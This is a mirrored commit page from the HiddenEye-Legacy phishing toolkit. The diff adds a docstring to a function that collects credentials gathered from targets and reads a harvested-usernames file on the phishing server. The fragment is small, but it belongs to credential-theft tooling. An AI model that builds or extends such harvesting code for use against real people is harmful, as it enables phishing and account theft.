mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Added doc string for credentials_collector
This commit is contained in:
parent
3fb8bb77ec
commit
04d98d28d6
|
@ -103,8 +103,8 @@ def module_loading_message(): # This one just show text..
|
|||
print(localization.lang_module_loading_message["select_any_mode"])
|
||||
|
||||
|
||||
def credentials_collector(port):
|
||||
|
||||
def credentials_collector():
|
||||
"""Collects, writes and returns credentials and additional info gathered from target."""
|
||||
print(localization.lang_credentials_collector["waiting_for_interaction"])
|
||||
while True:
|
||||
with open('Server/www/usernames.txt') as creds:
|
||||
|
|
Loading…
Reference in New Issue
Block a user